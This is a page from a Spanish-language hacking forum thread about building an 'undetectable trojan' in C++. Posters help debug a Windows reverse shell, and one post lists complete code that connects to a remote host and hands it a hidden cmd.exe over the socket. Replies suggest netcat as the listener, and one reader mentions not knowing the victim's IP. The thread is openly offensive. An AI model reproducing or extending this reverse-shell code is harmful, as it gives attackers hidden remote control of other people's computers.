elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Troyano en C++ indetectable!!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: Troyano en C++ indetectable!!  (Leído 43,202 veces)
Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #20 en: 16 Febrero 2014, 22:35 pm »

Sip,, me sirve.. Le estoy dando con todo (OllyDbg, depurando con VS, logica),, pero no estoy ni cerca jaja

Gracias!!
En línea

xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #21 en: 16 Febrero 2014, 23:41 pm »

Estaba leyendo la msdn y por lo que e visto tambien soporta dup2, en Windows es llamada _dup2.

Código:
http://msdn.microsoft.com/en-us/library/8syseb29.aspx

No hace falta que escriba una, recuerdo haber posteado una reverse shell en Bugs y Exploits pero para un sistema orientado a BSD, pero puedes guiarte, tiene algun tiempo podria hacer una mejor, pero esa ya te vale.

Código:
http://foro.elhacker.net/bugs_y_exploits/reverse_shell_unixlike-t380545.0.html

Un saludo.
En línea

Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #22 en: 17 Febrero 2014, 00:44 am »

Citar
  ;-)

No entiendo un pomo a simple vista.. pero me va a servir! No sabia de _dup,, me ayudo a ver que no se copia el handle a la estructura STARTUPINFO

Bueno,, a ver como se resuelve esto.. luego actualizo  :P

Gracias cpu! Saludos!
En línea

Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #23 en: 17 Febrero 2014, 03:09 am »

@cpu2 probe con eso que me decías del handle,, pero me parece que no es eso,, o al menos los valores se copian.. investigue que en windows también existe la función DuplicateHandle (con la cual también probé, pero no me funciona aun)

Así esta todo el código.. si alguien quiere revisarlo,,  ;D

Código
  1. #include <WinSock2.h>
  2. #pragma comment(lib,"ws2_32.lib")
  3.  
  4. #define PORT 8080
  5. #define IP "127.0.0.1"
  6. #define DEFAULT_BUFLEN 510
  7. #include <iostream>
  8. using namespace std;
  9.  
  10. // ESTRUCTURAS PARA SOCKET
  11. WSADATA WSA; //--> ESTRUCTURA WSADATA;
  12. SOCKET Socket; //--> VARIABLE DE TIPO SOCKET
  13. SOCKADDR_IN SA_IN; //--> ESTRUCTURA SOCKADDR_IN
  14. // ESTRUCTURAS PARA PROCESOS
  15. STARTUPINFOA SI;
  16. PROCESS_INFORMATION PI;
  17. // ---------------------------------------------------
  18.  
  19. int main()
  20. {
  21. // SOCKET
  22. WSAStartup(MAKEWORD(2, 2), &WSA);
  23. Socket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
  24.  
  25. SA_IN.sin_family  = AF_INET;
  26. SA_IN.sin_port  = htons(PORT);
  27. SA_IN.sin_addr.s_addr = inet_addr(IP);
  28.  
  29. connect(Socket, (struct sockaddr*)&SA_IN, sizeof(SA_IN));
  30. //  ---------------------------------------------------------------
  31.  
  32. SI.cb  = sizeof(SI);
  33. SI.wShowWindow  = SW_HIDE;
  34. SI.dwFlags  = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
  35. SI.lpDesktop      = SI.lpTitle = 0x0000;
  36. SI.lpReserved2  = NULL;
  37.  
  38. SI.hStdInput  = SI.hStdOutput = SI.hStdError = (HANDLE)Socket;
  39.  
  40.  
  41. LPSTR szCmdline  = "cmd.exe";
  42. CreateProcessA(NULL, szCmdline, NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI);
  43.  
  44. return 0;
  45. }
  46.  
En línea

xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #24 en: 17 Febrero 2014, 04:37 am »

No estoy acostumbrado a la API de Win, pero por lo que veo todo parece estar bien.

Como puedes observar en mi codigo, conecto duplico los descriptores y ejecuto la consola. Que server estas usando? yo cuando probe mi reverse shell utilize netcat.

Un saludo.
En línea

Vaagish


Desconectado Desconectado

Mensajes: 875



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #25 en: 17 Febrero 2014, 19:12 pm »

AWWGGRR!! El problema es el server si.. con netcat funciona.. creo que existe el código de nc,, tendría que ver por que mi cliente no mantiene la conexión estable..

Gracias!! Saludos!!
En línea

xv0


Desconectado Desconectado

Mensajes: 1.026



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #26 en: 17 Febrero 2014, 21:39 pm »

No el servidor, recuerda que es conexion inversa. Netcat es polifacetico puedes hacer mil cosas con el, hasta un server, por eso te dije.

E igualmente siempre puedes usar un Linux o un BSD, descargarte el source de netcat "nc" y modificarlo y crearte el propio server a partir de netcat jeje. Solo es una idea.

Un saludo.
En línea

burbu_1

Desconectado Desconectado

Mensajes: 159


hamen gaoz


Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #27 en: 18 Febrero 2014, 22:27 pm »

me suena un cliente para esa reverse shell (o muy parecida) en vb6..... pero el link no funciona

Citar

creía recordar que tenía ese code....pero no lo he encontrado..........

el mail del autor lo encuentras fijos y el code lo tiene algun mod fijo.......

si el problema lo tienes con el cliente en .net........

el debug que ofrece m$ es muy bueno....no.....noooo?
« Última modificación: 20 Febrero 2014, 19:04 pm por burbu_1 » En línea

Br1ant


Desconectado Desconectado

Mensajes: 791


Incluso la "nada" es un "algo"


Ver Perfil WWW
Re: Troyano en C++ indetectable!!
« Respuesta #28 en: 27 Febrero 2014, 09:45 am »

Muy bueno,
lo jodido es no poder saber la IP de la victima,

¡Gracias por la info bro!
En línea

Namasté, criatura.
hackisbuild

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: Troyano en C++ indetectable!!
« Respuesta #29 en: 5 Marzo 2014, 04:23 am »

Gracias por compartir los códigos me sirvieron de mucha ayuda, debido a que soy un Newie en esto.
En línea

Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Troyano indetectable? « 1 2 »
Análisis y Diseño de Malware
WIитX 16 13,927 Último mensaje 9 Noviembre 2012, 13:16 pm
por WIитX
Troyano indetectable
Análisis y Diseño de Malware
llAudioslavell 4 5,551 Último mensaje 5 Julio 2013, 03:23 am
por Jety
Dudas sobre troyano (.exe) indetectable.
Criptografía
pituu14 0 2,635 Último mensaje 18 Julio 2017, 02:33 am
por pituu14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines